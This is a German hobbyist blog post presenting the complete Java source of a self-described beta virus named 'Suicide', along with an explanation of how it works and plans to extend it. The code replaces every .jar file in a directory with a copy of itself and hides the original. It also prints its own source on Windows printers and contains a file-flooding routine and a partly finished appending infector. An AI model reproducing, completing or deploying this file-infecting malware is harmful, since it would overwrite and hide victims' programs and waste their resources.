R3s1stanc3

Ich bin root, ich darf das!

[Java] Suicide

Perforin hatte mir letztens von der Idee erzählt, den Drucker für den Payload zu benutzen.

Mir hat diese Idee gefallen und ich hab versucht, das ganze in Java umzusetzen, denn Java ist läuft ja auf jedem System (auf dem Java installiert ist), also sollte das kein großes Problem sein.

Denkste :D Ich habe zwar einen Code geschrieben, dieser funktioniert unter Windows aber unter Linux schaff ich es nicht, den Drucker anzusteuern.

Ich hatte dann also den Code fertig und dachte mir, ich schreib mal einen kleinen Virus in Java. In der aktuellen Version (nur eine Beta) infiziert er Dateien auf die selbe Art, wie der Wagner Virus (original Datei umbenennen in “.”+dateiname, verstecken und eine Kopie von sich selbst als dateiname erstellen) Wenn eine Datei “.”+dateiname existiert, wird diese nach dem Virus ausgeführt, sonst löscht er sich selbst.

Mein Ziel ist es, die Infection wie bei einem Crypter ablaufen zu lassen. Also die original Datei einlesen, an eine Kopie von sich selbst anhängen und beide Dateien durch einen Splitstring trennen. Beim ausführen sich selbst einlesen und die original Datei ausführen. Das zusammenführen funktioniert schon, ich hänge nur noch daran, die original Datei wieder herzustellen.

Payload gibt es bis jetzt nur für Windows PC’s: Ich habe die Main Klasse, die auch den Code ausführt, in einen String geschrieben und lasse diesen ausdrucken.

Ich habe auf jeden Fall noch vor das ganze zu erweitern, also neue Infection-Routine und einen Payload für Linux (am besten auch etwas drucken, sonst überleg ich mir etwas anderes)

Als Entwicklungsumgebung habe ich BlueJ benutzt, da ich es schön einfach gehalten ist.

Auf meiner neuen Projektseite habe ich den Quellcode, das ganze BlueJ Projekt und die Dukomentation hochgeladen. Link

Und hier ist nochmal der Quellcode mit Syntaxhighlighting:

Suicide (suicide.java) download
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
**
 * My first little Virus in Java
 * Aus der Schwärze der Knechtschaft durch blutige Schlachten ans goldene Licht der Freiheit.
 *
 * @author R3s1stanc3
 * @version 0.9
 */

import java . io . * ;
import java . lang . String ;

public class Main
{

    private static String splitStr = "abcdefg" ; // not in use now

    /**
     * The main function of the Virus, which starts the whole payload
     */
    public static void main ( String [ ] args )
    {

        Virii virii = new Virii ( ) ;
        String myself = virii . getName ( ) ;
        String os = virii . getOS ( ) ;

        // Get a list of all *.jar files in the current directory
        String [ ] jarList = virii . listJar ( ) ;

        // Replace every *.jar file with a copy of myselfFile myFile = new File ( myself ) ;
        for ( String s : jarList )
        {
            if ( ! s . equals ( myself ) && s . indexOf ( "." ) != 0 )
            {
                virii . copyFile ( s, "." + s ) ;
                virii . copyFile ( myself, s ) ;
                if ( os . equals ( "Windows" ) ) virii . hideFile ( "." + s ) ;
            }
        }

        // Prints his own main function
        if ( os . equals ( "Windows" ) )
        {
            virii . writeFile ( "a.txt", virii . getMyCode ( ) ) ;
            new Print ( ) . print ( "a.txt" ) ;
            virii . deleteFile ( "a.txt" ) ;
        }

        // If there is an infected file -> execute it; else delete yourself
        if ( virii . existsFile ( "." + myself ) ) virii . execute ( "." + myself ) ;
        else virii . deleteFile ( myself ) ;

    }

}





/**
 * This class contains all funktions of the virus
 * 
 * @author R3s1stanc3
 * @version 0.9
 */

import java . io . * ;
import java . util . Random ;
import java . lang . * ;

public class Virii
{

    private static String myCode =
        "public class Main\n" +
        "{\n" +
        "    public static void main ( String [ ] args )\n" +
        "    {\n" +
        "        Virii virii = new Virii ( ) ;\n" +
        "        String myself = virii . getName ( ) ;\n" +
        "        String os = virii . getOS ( ) ;\n" +
        "        String [ ] jarList = virii . listJar ( ) ;\n" +
        "        for ( String s : jarList )\n" +
        "        {\n" +
        "            if ( ! s . equals ( myself ) && s . indexOf ( \".\" ) != 0 )\n" +
        "            {\n" +
        "                virii . copyFile ( s, \".\" + s ) ;\n" +
        "                virii . copyFile ( myself, s ) ;\n" +
                "                if ( os . equals ( \"Windows\" ) ) virii . hideFile ( \".\" + s ) ;\n" +
        "            }\n" +
        "        }\n" +
        "        if ( os . equals ( \"Windows\" ) ) \n" +
        "        {\n" +
        "           virii . writeFile ( \"a.txt\", virii . getMyCode ( ) ) ;\n" +
        "           new Print ( ) . print ( \"a.txt\" ) ;\n" +
        "           virii . deleteFile ( \"a.txt\" ) ;\n" +
        "        }\n" +
        "        if ( virii . existsFile ( \".\" + myself ) ) virii . execute ( \".\" + myself ) ) ;\n" +
        "        else virii . deleteFile ( myself ) ;\n" +
        "    }\n" +
        "}" ;


    /**
     * Function to get the file name of the running file
     * @return Filename as String
     */
    public String getName ( )
    {

        String filename = new File ( this . getClass ( ) . getProtectionDomain ( ) . getCodeSource ( ) . getLocation ( ) . getPath ( ) ) . getName ( ) ;
        //filename = filename . indexOf ( "." ) > -1 ? ( filename . substring ( 0, filename . lastIndexOf ( "." ) ) ) : ( filename ) ;
        if ( filename . indexOf ( "." ) > -1 )
             filename = filename . substring ( 0, filename . lastIndexOf ( "." ) ) ;
        else
            filename = filename ;
        return filename + ".jar" ;

    }

    /**
     * Floods the current directory with files
     * The files are named with random Integers and filled with rand Integers too
     * @param number Number of files to flood
     */
    public void flood ( int number )
    {

        FileOutputStream out ;
        PrintStream p ;
        Random rand = new Random ( ) ;

        try
        {
            for ( int i = 0; i < number; i ++ )
            {
                Integer j = new Integer ( rand . nextInt ( ) ) ;
                out = new FileOutputStream ( j . toString ( ) ) ;
                p = new PrintStream ( out ) ;

                p . println ( rand . nextInt ( ) ) ;

                p . close ( ) ;
            }
        }
        catch ( Exception e ) { }

    }

    /**
     * Creates a directory
     * @param name Name of the directory
     */
    public void createDir ( String name )
    {

        boolean dir = new File ( name ) . mkdir ( ) ;

    }

    /**
     * Lists all *.jar files in the current directory
     * @return String Array with all file names
     */
    public String [ ] listJar ( )
    {

        File dir = new File ( "./" ) ;
        String [ ] fileList = dir . list ( new FilenameFilter ( )
        {
            public boolean accept ( File d, String name )
            {
                return name . endsWith ( ".jar" ) ;
            }
        } ) ;
        return fileList ;

    }

    /**
     * Copies a file to a destination
     * @param source Name of the source file
     * @param dest Name of the destination file
     */
    public void copyFile ( String source, String dest )
    {

        try
        {
            File f1 = new File ( source ) ;
            File f2 = new File ( dest ) ;

            InputStream in = new FileInputStream ( f1 ) ;
            OutputStream out = new FileOutputStream ( f2 ) ;

            byte [ ] buf = new byte [ 1024 ] ;
            int len ;

            while ( ( len = in . read ( buf ) ) > 0 )
            {
                out . write ( buf, 0, len ) ;
            }

            in . close ( ) ;
            out . close ( ) ;
            f2 . setExecutable ( true ) ;
            System . out . println ( "copied \n" + source + " to \n" + dest + "!" ) ;
        }
        catch ( FileNotFoundException ex ) { }
        catch ( IOException e ) { }

    }

    public String getOS ( )
    {

        if ( System.getProperty("os.name") . indexOf ( "Lin" ) != -1 ) return "Linux" ;
        else if ( System.getProperty("os.name") . indexOf ( "Win" ) != -1 ) return "Windows" ;
        else return null ;

    }

    /**
     * Executes a file (I found the code on the internet)
     * @param file Name of the file to execute
     */
    public void execute ( String file )
    {

        try
        {

            Process p = null;
            ProcessBuilder pb = new ProcessBuilder ( "./" + file ) ;
            p = pb . start ( ) ;

            InputStream in = null ;
            OutputStream outS = null ;

            StringBuffer commandResult = new StringBuffer ( ) ;
            String line = null ;
            int readInt ;

            int returnVal = p . waitFor ( ) ;

            in = p . getInputStream ( ) ;

            while ( ( readInt = in . read ( ) ) != -1 )
                commandResult . append ( ( char ) readInt ) ;
            outS = ( BufferedOutputStream ) p . getOutputStream ( ) ;
            outS . close ( ) ;

            System . out . println ( commandResult . toString ( ) ) ;
            in . close ( ) ;


        }
        catch ( Exception e ) { }

    }

    /**
     * Used to split an infected file using a splitstring; not in use; but it works (tested with textfiles)
     * @param file File to split
     * @param splitStr The splitstring
     * @return The to parts of the file in a Stringarray
     */
    public String [ ] getOldFile ( String file, String splitStr )
    {

        try
        {
            StringBuffer fileData = new StringBuffer ( 1000 ) ;
            BufferedReader reader = new BufferedReader ( new FileReader ( file ) ) ;
            char [ ] buf = new char [ 1024 ] ;
            int numRead = 0 ;
            while ( ( numRead = reader . read ( buf ) ) != -1 )
            {
                String readData = String . valueOf ( buf, 0, numRead ) ;
                fileData . append ( readData ) ;
                buf = new char [ 1024 ] ;
            }
            reader.close();

            String data = fileData . toString ( ) ;
            String [ ] splited ;
            splited = data . split ( splitStr ) ;
            return splited ;

        }
        catch ( Exception e ) { return null ; }

    }

    /**
     * Writes a String to a file
     * @param fi File to write to
     * @param data String to write in the file
     */
    public void writeFile ( String fi, String data )
    {

        try
        {
            File file = new File ( fi ) ;
            FileWriter fw = new FileWriter ( file ) ;
            fw . write ( data ) ;
            fw . flush ( ) ;
            fw . close ( ) ;
        }
        catch ( Exception e ) { }

    }

    /**
     * Reads the content of a file
     * @param name Name of the file
     * @return The files content as String
     */
    public String readFile ( String name )
    {

        try
        {
            RandomAccessFile file = new RandomAccessFile ( name, "r" ) ;
            byte [ ] data = new byte [ ( int ) file . length ( ) ] ;

            file . read ( data ) ;

            file . close ( ) ;

            return new String ( data ) ;
        }
        catch ( Exception e ) { return null ; }

    }

    /**
     * Should combine two files with a splitstring in between; doesn't work; not in use; Second file will be executed when executed. - Special thanks to ringi
     * @param file Name of the file
     * @param split Splitstring between hostfile and infected file
     */
    public void infectFile ( String file, String split )
    {

        try
        {
            RandomAccessFile data1 = new RandomAccessFile ( "." + file, "r" ) ;
            RandomAccessFile data2 = new RandomAccessFile ( file, "r" ) ;

            byte [ ] byte1 = new byte [ ( int ) data1.length ( ) ] ;
            byte [ ] byte2 = new byte [ ( int ) data2.length ( ) ] ;
            byte [ ] splitBytes = new byte [ split . length ( ) ] ;
            byte [ ] both = new byte [ split . length ( ) + byte1 . length + byte2 . length ] ;

            splitBytes = split . getBytes ( ) ;

            data1.read ( byte1 ) ;
            data2.read ( byte2 ) ;
            data1.close ( ) ;
            data2.close ( ) ;

            both = concat ( byte1, splitBytes, byte2 ) ;

            RandomAccessFile newFile = new RandomAccessFile ( file, "rw" ) ;
            newFile . write ( both ) ;
            newFile . close ( ) ;
        }
        catch ( Exception e ) { }

    }

    /**
     * Connects 3 Bytearrays to one - Special thanks to ringi
     * @param A first Bytearray
     * @param B second Bytearray
     * @param C third Bytearray
     * @return The big byte array
     */
    public byte [ ] concat ( byte [ ] A, byte [ ] B, byte [ ] C )
    {

        byte [ ] D = new byte [ A . length + B . length + C . length ] ;
        System . arraycopy ( A, 0, D, 0, A . length ) ;
        System . arraycopy ( B, 0, D, A . length, B . length ) ;
        System . arraycopy ( C, 0, D, A . length + B . length, C . length ) ;
        return D ;

    }

    /**
     * Deletes a file
     * @param file File to delete
     */
    public void deleteFile ( String file )
    {

        ( new File ( file ) ) . delete ( ) ;

    }

    /**
     * Hides a file under windows
     * @param fileName File to hide
     */
    public void hideFile ( String fileName )
    {

        try
        {
            Runtime . getRuntime ( ) . exec ( new String [ ] { "cmd", "/c", "attrib", "+H", "." + fileName } ) ;
        }
        catch ( Exception e ) { }

    }

    /**
     * Checks if a file exists
     * @param file File to check
     * @return true: exists; false: does not exist
     */
    public boolean existsFile ( String file )
    {

        return ( new File ( file ) ) . exists ( ) ;

    }

    /**
     * Checks if a file is infected
     * @param data The content of the file
     * @param splitStr The splitstring
     * @return true: is infected; false: is not infected
     */
    public boolean isInfected ( String data, String splitStr )
    {

        return ( data . split ( splitStr ) . length ) > 1 ;

    }

    public String getMyCode ( )
    {

        return myCode ;

    }

}





/**
 * This class prints a file ( only for Windows )
 * 
 * @author R3s1stanc3
 * @version 1.0
 */

import java . awt . Desktop ;
import java . io . * ;

public class Print
{

    /**
     * Prints a file on a Windows System
     * @param file Name of the file to print
     */
    public void print ( String file )
    {

        try
        {
            Desktop desktop = null ;
            if ( Desktop . isDesktopSupported ( ) )
            {
                desktop = Desktop . getDesktop ( ) ;
            }
            desktop . print ( new File ( file ) ) ;
        }
        catch ( UnsupportedOperationException e ) { }
        catch ( Exception ex ) { }

    }

}